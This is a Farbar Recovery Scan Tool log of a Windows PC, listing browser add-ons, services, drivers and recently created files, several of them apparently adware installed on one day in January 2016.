BHO-x32: SmartSelect Class -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2015-09-24] (Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2015-09-24] (Adobe Systems Incorporated)
Toolbar: HKLM-x32 - FromDocToPDF - {c66a678d-5e6c-4af9-8f57-c6192f42cf74} - C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\65bar.dll [2015-02-11] (Mindspark)
Toolbar: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000 -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - No File
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
Handler-x32: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
Handler-x32: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL [2015-02-03] (Microsoft Corporation)
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
Handler-x32: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\mcafee\MSC\McSnIePl64.dll [2015-12-03] (McAfee, Inc.)
Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files (x86)\McAfee\MSC\McSnIePl.dll [2015-12-03] (McAfee, Inc.)
FireFox:
========
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_20_0_0_267.dll [2016-01-01] ()
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL [2015-12-03] ()
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.41105.0\npctrl.dll [2015-11-04] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_267.dll [2016-01-01] ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1204144.dll [2013-09-05] (Adobe Systems, Inc.)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-12-10] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-12-10] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.65.2 -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\dtplugin\npDeployJava1.dll [2016-01-01] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.65.2 -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\plugin2\npjp2.dll [2016-01-01] (Oracle Corporation)
FF Plugin-x32: @mcafee.com/MSC,version=10 -> c:\PROGRA~2\mcafee\msc\NPMCSN~1.DLL [2015-12-03] ()
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2015-11-03] (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.41105.0\npctrl.dll [2015-11-04] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL [2014-11-02] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-04] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-04] (Google Inc.)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [2011-09-28] ()
FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Air\nppdf32.dll [2015-09-24] (Adobe Systems Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2014-12-03] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1024156207-2972793060-2867319265-1000: gradecam.com/GCPlugin -> C:\Users\Charlie\AppData\Roaming\GradeCam Corporation\GCPlugin\npGCPlugin_2.0.2.10.dll [2015-10-08] (GradeCam Corporation)
FF Plugin HKU\S-1-5-21-1024156207-2972793060-2867319265-1000: gradecam.com/GCPlugin2 -> C:\Users\Charlie\AppData\Roaming\GradeCam\GCPlugin2\2.0.2.10\npGCPlugin2_2.0.2.10.dll [2015-10-08] (GradeCam)
FF Plugin HKU\S-1-5-21-1024156207-2972793060-2867319265-1000: gradecam.com/GCPluginx64 -> C:\Users\Charlie\AppData\Roaming\GradeCam Corporation\GCPlugin64\npGCPlugin64_2.0.2.10.dll [2015-10-08] (GradeCam Corporation)
FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
FF Extension: McAfee WebAdvisor - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi [2015-11-23]
FF HKLM-x32\...\Firefox\Extensions: [
[email protected]] - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn
FF Extension: Adobe Acrobat - Create PDF - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn [2015-11-15] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
FF Extension: McAfee WebAdvisor - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi [2015-11-23]
FF HKLM-x32\...\Thunderbird\Extensions: [
[email protected]] - C:\Program Files\McAfee\MSK
FF Extension: McAfee Anti-Spam Thunderbird Extension - C:\Program Files\McAfee\MSK [2015-11-29] [not signed]
Chrome:
=======
CHR HomePage: Default -> hxxp://www.google.com
CHR StartupUrls: Default -> "hxxp://www.google.com"
CHR DefaultSearchURL: Default -> hxxps://search.yahoo.com/search?fr=mcafee&type=C211US0D20151117&p={searchTerms}
CHR DefaultSearchKeyword: Default -> mcafee
CHR Profile: C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-02-04]
CHR Extension: (Google Docs) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-02-04]
CHR Extension: (Google Drive) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-29]
CHR Extension: (YouTube) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-25]
CHR Extension: (Adblock Plus) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2016-01-05]
CHR Extension: (Google Search) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-29]
CHR Extension: (Google Sheets) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-02-04]
CHR Extension: (SiteAdvisor) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2015-11-26]
CHR Extension: (Google Docs Offline) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-11-17]
CHR Extension: (GradeCam Helper) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\lghkdmpjndggpffgahogcopicpednbgm [2015-11-26]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-07-23]
CHR Extension: (Gmail) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-04-03]
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2015-12-02]
CHR HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lghkdmpjndggpffgahogcopicpednbgm] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2015-12-02]
==================== Services (Whitelisted) ========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [318592 2013-11-29] (Windows ® Win 7 DDK provider) [File not signed]
R2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [2802360 2015-11-24] (Microsoft Corporation)
S2 CLKMSVC10_99E320F5; C:\Program Files (x86)\CyberLink\PowerDVD12\Common\NavFilter\kmsvc.exe [243464 2014-05-02] (CyberLink)
R2 FromDocToPDF_65Service; C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\65barsvc.exe [90696 2015-02-11] (Mindspark)
S2 Fusion Browser Startup Service; C:\Program Files\FusionBrowser\wdsvc2.exe [298496 2015-11-24] () [File not signed]
R2 Garmin Core Update Service; C:\Program Files (x86)\Garmin\Core Update Service\Garmin.Cartography.MapUpdate.CoreService.exe [517464 2015-01-28] (Garmin Ltd or its subsidiaries)
R2 HomeNetSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [451960 2015-11-02] (McAfee, Inc.)
R2 HPSLPSVC; C:\Users\Charlie\AppData\Local\Temp\7zS65A9\hpslpsvc64.dll [1039360 2013-07-19] (Hewlett-Packard Co.) [File not signed]
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [25800 2015-09-28] (Hewlett-Packard Company)
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [15720 2013-11-08] (Intel Corporation)
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [315352 2014-11-27] (Intel Corporation)
R2 Intel® Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel® Corporation) [File not signed]
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel® Corporation)
R2 Intel® ME Service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe [131544 2013-12-10] (Intel Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [169432 2013-12-10] (Intel Corporation)
R2 LavasoftTcpService; C:\Program Files (x86)\Lavasoft\Web Companion\TcpService\2.3.4.7\LavasoftTcpService.exe [2751760 2016-01-10] (Lavasoft Limited)
R2 McAfee SiteAdvisor Service; C:\Program Files (x86)\McAfee\SiteAdvisor\McSACore.exe [157928 2015-12-02] (McAfee, Inc.)
R2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [863448 2015-12-03] (McAfee, Inc.)
R2 mccspsvc; C:\Program Files\Common Files\McAfee\CSP\1.8.203.0\McCSPServiceHost.exe [1694152 2015-12-02] (McAfee, Inc.)
R2 McMPFSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [451960 2015-11-02] (McAfee, Inc.)
R2 McNaiAnn; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [451960 2015-11-02] (McAfee, Inc.)
S3 McODS; C:\Program Files\mcafee\VirusScan\mcods.exe [679120 2015-10-20] (McAfee, Inc.)
R2 mcpltsvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [451960 2015-11-02] (McAfee, Inc.)
R2 McProxy; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [451960 2015-11-02] (McAfee, Inc.)
R3 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [233680 2015-09-21] (McAfee, Inc.)
R2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe [378848 2015-10-21] (McAfee, Inc.)
R3 mfevtp; C:\Windows\system32\mfevtps.exe [256840 2015-09-21] (McAfee, Inc.)
R2 MFLService2; C:\Program Files (x86)\Get-a-Clip\MFLService2.exe [1983640 2016-01-10] ()
R2 MSK80Service; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [451960 2015-11-02] (McAfee, Inc.)
R2 omniserv; C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe [88064 2014-03-28] (Softex Inc.) [File not signed]
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [290520 2014-01-08] (Realtek Semiconductor)
R2 SearchProtectionService; C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.SearchProtect.WinService.exe [17168 2016-01-10] ()
R2 SMARTHelperService; C:\Program Files (x86)\SMART Technologies\Education Software\SMARTHelperService.exe [538416 2014-02-12] (SMART Technologies)
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [191728 2014-06-16] (Synaptics Incorporated)
R2 valWBFPolicyService; C:\Windows\system32\valWBFPolicyService.exe [32768 2013-08-01] (Validity Sensors, Inc.) [File not signed]
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2014-07-07] (Microsoft Corporation)
S2 wusvc; C:\Program Files\WebUpdater\webupdaterservice.exe [61952 2015-12-30] (Web Updater Media) [File not signed]
R2 ZAtheros Bt and Wlan Coex Agent; C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe [323584 2013-11-29] (Atheros) [File not signed]
===================== Drivers (Whitelisted) ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R3 BTATH_LWFLT; C:\Windows\System32\DRIVERS\btath_lwflt.sys [77464 2013-11-29] (Qualcomm Atheros)
R3 cfwids; C:\Windows\System32\drivers\cfwids.sys [80760 2015-09-23] (McAfee, Inc.)
R1 CLVirtualDrive; C:\Windows\System32\DRIVERS\CLVirtualDrive.sys [91912 2013-11-12] (CyberLink)
S3 ebdrv; C:\Windows\system32\drivers\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
S3 HipShieldK; C:\Windows\System32\drivers\HipShieldK.sys [207208 2015-05-19] (McAfee, Inc.)
R0 iaStorF; C:\Windows\System32\drivers\iaStorF.sys [28008 2013-11-08] (Intel Corporation)
S3 lehidmini; C:\Windows\system32\drivers\leath_hid.sys [39704 2013-11-29] (Atheros)
R2 McPvDrv; C:\Windows\system32\drivers\McPvDrv.sys [76064 2015-09-29] (McAfee, Inc.)
R3 MEIx64; C:\Windows\system32\drivers\TeeDriverx64.sys [100312 2013-12-10] (Intel Corporation)
R3 mfeaack; C:\Windows\System32\drivers\mfeaack.sys [415976 2015-09-23] (McAfee, Inc.)
R3 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [351120 2015-09-23] (McAfee, Inc.)
R3 mfefirek; C:\Windows\System32\drivers\mfefirek.sys [497888 2015-09-23] (McAfee, Inc.)
R0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [841944 2015-09-23] (McAfee, Inc.)
R3 mfencbdc; C:\Windows\System32\DRIVERS\mfencbdc.sys [537192 2015-10-06] (McAfee, Inc.)
S3 mfencrk; C:\Windows\System32\DRIVERS\mfencrk.sys [109480 2015-10-06] (McAfee, Inc.)
R3 mfesapsn; C:\Program Files (x86)\McAfee\SiteAdvisor\x64\mfesapsn.sys [37960 2015-12-02] (McAfee, Inc.)
R0 mfewfpk; C:\Windows\System32\drivers\mfewfpk.sys [244544 2015-09-23] (McAfee, Inc.)
U5 RTSPER; C:\Windows\System32\Drivers\RTSPER.sys [476888 2014-03-21] (Realsil Semiconductor Corporation)
R3 SMARTMouseFilterx64; C:\Windows\System32\DRIVERS\SMARTMouseFilterx64.sys [10240 2014-02-12] (SMART Technologies)
R3 SMARTVHidMiniVistaAmd64; C:\Windows\System32\DRIVERS\SMARTVHidMiniVistaAmd64.sys [9216 2014-02-12] (SMART Technologies)
S3 SMARTVTabletPCx64; C:\Windows\System32\DRIVERS\SMARTVTabletPCx64.sys [22184 2014-02-12] (SMART Technologies ULC)
S3 SmbDrv; C:\Windows\system32\drivers\Smb_driver_AMDASF.sys [30448 2014-06-16] (Synaptics Incorporated)
R3 SmbDrvI; C:\Windows\system32\drivers\Smb_driver_Intel.sys [31472 2014-06-16] (Synaptics Incorporated)
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One Month Created files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2016-01-10 12:42 - 2016-01-10 12:42 - 00001150 _____ C:\Users\Charlie\Desktop\FRST64 - Shortcut.lnk
2016-01-10 12:40 - 2016-01-10 12:40 - 02370560 _____ (Farbar) C:\Users\Charlie\Downloads\FRST64 (2).exe
2016-01-10 12:19 - 2016-01-10 12:21 - 00067326 _____ C:\Users\Charlie\Downloads\Addition.txt
2016-01-10 12:18 - 2016-01-10 12:43 - 00042563 _____ C:\Users\Charlie\Downloads\FRST.txt
2016-01-10 12:18 - 2016-01-10 12:43 - 00000000 ____D C:\FRST
2016-01-10 12:18 - 2016-01-10 12:18 - 02370560 _____ (Farbar) C:\Users\Charlie\Downloads\FRST64 (1).exe
2016-01-10 12:17 - 2016-01-10 12:17 - 02370560 _____ (Farbar) C:\Users\Charlie\Downloads\FRST64.exe
2016-01-10 11:57 - 2016-01-10 11:57 - 00003824 _____ C:\Windows\System32\Tasks\WebUpdater Task
2016-01-10 11:57 - 2016-01-10 11:57 - 00000095 _____ C:\wulog.txt
2016-01-10 11:57 - 2016-01-10 11:57 - 00000000 ____D C:\Users\Charlie\AppData\Local\WebUpdater
2016-01-10 11:57 - 2016-01-10 11:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WebUpdater
2016-01-10 11:56 - 2016-01-10 12:06 - 00000000 ____D C:\Users\Charlie\AppData\Local\chrome
2016-01-10 11:56 - 2016-01-10 11:56 - 00004034 _____ C:\Windows\System32\Tasks\Fusion Browser Update Task
2016-01-10 11:56 - 2016-01-10 11:56 - 00003300 _____ C:\Windows\System32\Tasks\WebUpdater LaunchTask
2016-01-10 11:56 - 2016-01-10 11:56 - 00003280 _____ C:\Windows\System32\Tasks\Fusion Browser Launch Task
2016-01-10 11:56 - 2016-01-10 11:56 - 00000977 _____ C:\Users\Public\Desktop\Fusion Browser.lnk
2016-01-10 11:56 - 2016-01-10 11:56 - 00000000 ____D C:\Users\Charlie\AppData\Local\FusionBrowser
2016-01-10 11:56 - 2016-01-10 11:56 - 00000000 ____D C:\Program Files\WebUpdater
2016-01-10 11:56 - 2016-01-10 11:56 - 00000000 ____D C:\Program Files\FusionBrowser
2016-01-10 11:55 - 2016-01-10 11:55 - 00111600 _____ C:\Windows\SysWOW64\mfllib.dll
2016-01-10 11:55 - 2016-01-10 11:55 - 00023236 _____ C:\Windows\System32\Tasks\{780E0B47-7A78-0A0E-0911-0B79050F110A}
2016-01-10 11:55 - 2016-01-10 11:55 - 00003572 _____ C:\Windows\System32\Tasks\One System Care Task
2016-01-10 11:55 - 2016-01-10 11:55 - 00003264 _____ C:\Windows\System32\Tasks\One System Care Monitor
2016-01-10 11:55 - 2016-01-10 11:55 - 00002860 _____ C:\Windows\System32\Tasks\One System CarePeriod
2016-01-10 11:55 - 2016-01-10 11:55 - 00001071 _____ C:\Users\Public\Desktop\Launch One System Care.lnk
2016-01-10 11:55 - 2016-01-10 11:55 - 00000280 _____ C:\Windows\Tasks\One System CarePeriod.job
2016-01-10 11:55 - 2016-01-10 11:55 - 00000000 ____D C:\Users\Charlie\AppData\Roaming\One System Care
2016-01-10 11:55 - 2016-01-10 11:55 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\One System Care
2016-01-10 11:55 - 2016-01-10 11:55 - 00000000 ____D C:\ProgramData\edc8d5e4-5c45-1
2016-01-10 11:55 - 2016-01-10 11:55 - 00000000 ____D C:\ProgramData\edc8d5e4-02f5-0
2016-01-10 11:55 - 2016-01-10 11:55 - 00000000 ____D C:\Program Files (x86)\OneSystemCare
2016-01-10 11:55 - 2016-01-10 11:55 - 00000000 ____D C:\Program Files (x86)\Get-a-Clip
2016-01-10 11:54 - 2016-01-10 11:54 - 00425744 _____ (Lavasoft Limited) C:\Windows\system32\LavasoftTcpService64.dll
2016-01-10 11:54 - 2016-01-10 11:54 - 00345360 _____ (Lavasoft Limited) C:\Windows\SysWOW64\LavasoftTcpService.dll
2016-01-10 11:54 - 2016-01-10 11:54 - 00002880 _____ C:\Windows\SysWOW64\LavasoftTcpServiceOff.ini
2016-01-10 11:54 - 2016-01-10 11:54 - 00002880 _____ C:\Windows\system32\LavasoftTcpServiceOff.ini
2016-01-10 11:54 - 2016-01-10 11:54 - 00000397 _____ C:\Prefs.js
2016-01-10 11:54 - 2016-01-10 11:54 - 00000000 ____D C:\Users\Charlie\AppData\Roaming\Lavasoft
2016-01-10 11:54 - 2016-01-10 11:54 - 00000000 ____D C:\Users\Charlie\AppData\Local\Lavasoft
2016-01-10 11:54 - 2016-01-10 11:54 - 00000000 ____D C:\searchplugins
2016-01-10 11:54 - 2016-01-10 11:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavasoft
2016-01-10 11:54 - 2016-01-10 11:54 - 00000000 ____D C:\Program Files (x86)\Lavasoft
2016-01-10 11:53 - 2016-01-10 11:53 - 00000000 ____D C:\ProgramData\Lavasoft
2016-01-10 09:58 - 2016-01-10 09:58 - 00003846 _____ C:\Windows\System32\Tasks\Intel Security DAT Reputation (AMCore) periodic endpoint safety pulse
2016-01-09 16:14 - 2016-01-09 16:14 - 00004020 _____ C:\Windows\System32\Tasks\Intel Security DAT Reputation (AMCore) Post DAT update endpoint safety pulse
2016-01-03 17:56 - 2016-01-03 19:14 - 00000000 ____D C:\ProgramData\MSNDynFiles
2016-01-01 15:09 - 2016-01-01 15:09 - 00000000 ____D C:\Users\Charlie\AppData\Roaming\Sun
2016-01-01 15:09 - 2016-01-01 15:09 - 00000000 ____D C:\Users\Charlie\.oracle_jre_usage
2016-01-01 15:08 - 2016-01-01 15:08 - 00000000 ____D C:\Users\Charlie\AppData\LocalLow\Oracle
2016-01-01 15:06 - 2016-01-01 15:06 - 00002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk
2016-01-01 15:06 - 2016-01-01 15:06 - 00002019 _____ C:\Users\Public\Desktop\Adobe Reader XI.lnk
2015-12-11 12:38 - 2015-12-11 12:38 - 00000000 ____D C:\Users\Charlie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox
==================== One Month Modified files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2016-01-10 12:34 - 2009-07-13 23:45 - 00034432 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2016-01-10 12:34 - 2009-07-13 23:45 - 00034432 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2016-01-10 12:31 - 2015-06-30 15:15 - 00000926 _____ C:\Windows\Tasks\DropboxUpdateTaskUserS-1-5-21-1024156207-2972793060-2867319265-1000UA.job
2016-01-10 12:20 - 2014-11-03 13:41 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-01-10 12:19 - 2009-07-13 22:20 - 00000000 ____D C:\Windows
2016-01-10 11:48 - 2014-07-07 21:47 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2016-01-10 09:58 - 2014-10-18 16:32 - 00003958 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{8AA93FD4-5F8F-41DB-A04A-5E7F090BEAB9}
2016-01-09 22:57 - 2014-10-18 19:53 - 00000000 ____D C:\Users\Charlie\AppData\Local\CrashDumps
2016-01-09 21:31 - 2015-06-30 15:15 - 00000874 _____ C:\Windows\Tasks\DropboxUpdateTaskUserS-1-5-21-1024156207-2972793060-2867319265-1000Core.job
2016-01-09 16:20 - 2014-11-03 13:41 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-01-09 07:05 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\system32\NDF
2016-01-07 22:52 - 2014-11-03 13:41 - 00000000 ____D C:\Users\Charlie\AppData\Local\Deployment
2016-01-07 22:47 - 2009-07-14 00:13 - 00784286 _____ C:\Windows\system32\PerfStringBackup.INI
2016-01-07 22:47 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\inf
2016-01-03 20:27 - 2014-11-09 13:34 - 00000000 ____D C:\Users\Charlie\Documents\Personal
2016-01-03 19:14 - 2014-10-28 15:26 - 00000000 ____D C:\Users\Charlie\AppData\Roaming\MSN6
2016-01-03 18:48 - 2014-07-07 21:47 - 00796864 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2016-01-03 18:48 - 2014-07-07 21:47 - 00142528 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2016-01-03 18:48 - 2014-07-07 21:47 - 00003768 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2016-01-03 18:01 - 2015-11-17 17:36 - 00000000 __RSD C:\Users\Charlie\Documents\McAfee Vaults
2016-01-03 18:01 - 2014-10-18 16:30 - 00000000 ____D C:\Users\Charlie\Documents\Youcam
2016-01-03 18:00 - 2015-03-04 19:22 - 00000000 ___RD C:\Users\Charlie\Dropbox
2016-01-03 18:00 - 2015-03-04 19:18 - 00000000 ____D C:\Users\Charlie\AppData\Roaming\Dropbox
2016-01-03 17:57 - 2015-11-11 13:13 - 00000340 _____ C:\Windows\Tasks\HPCeeScheduleForCharlie.job
2016-01-03 17:57 - 2009-07-14 00:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-01-03 05:38 - 2015-11-11 13:13 - 00003198 _____ C:\Windows\System32\Tasks\HPCeeScheduleForCharlie
2016-01-01 15:09 - 2015-02-20 21:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-01-01 15:09 - 2014-10-18 16:27 - 00000000 ____D C:\Users\Charlie
2016-01-01 15:08 - 2015-02-20 21:19 - 00097888 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2016-01-01 15:08 - 2015-02-20 21:18 - 00000000 ____D C:\Program Files (x86)\Java
2016-01-01 15:04 - 2014-07-07 21:50 - 00000000 ____D C:\ProgramData\Adobe
2016-01-01 15:04 - 2014-07-07 21:50 - 00000000 ____D C:\Program Files (x86)\Adobe
2015-12-21 09:56 - 2014-10-18 16:33 - 00000000 ____D C:\Users\Charlie\Documents\Bluetooth Folder
2015-12-20 12:06 - 2014-11-16 23:26 - 00003946 _____ C:\Users\Charlie\AppData\Roaming\evpro32.prf
2015-12-18 07:54 - 2014-07-07 21:48 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2015-12-18 07:48 - 2014-10-18 19:53 - 00000000 ____D C:\Program Files\Microsoft Office 15
2015-12-18 07:37 - 2015-04-07 13:24 - 00000000 ___SD C:\Windows\SysWOW64\GWX
2015-12-18 07:37 - 2015-04-07 13:24 - 00000000 ___SD C:\Windows\system32\GWX
2015-12-16 18:27 - 2015-11-17 17:35 - 00003080 _____ C:\Windows\System32\Tasks\McAfeeLogon
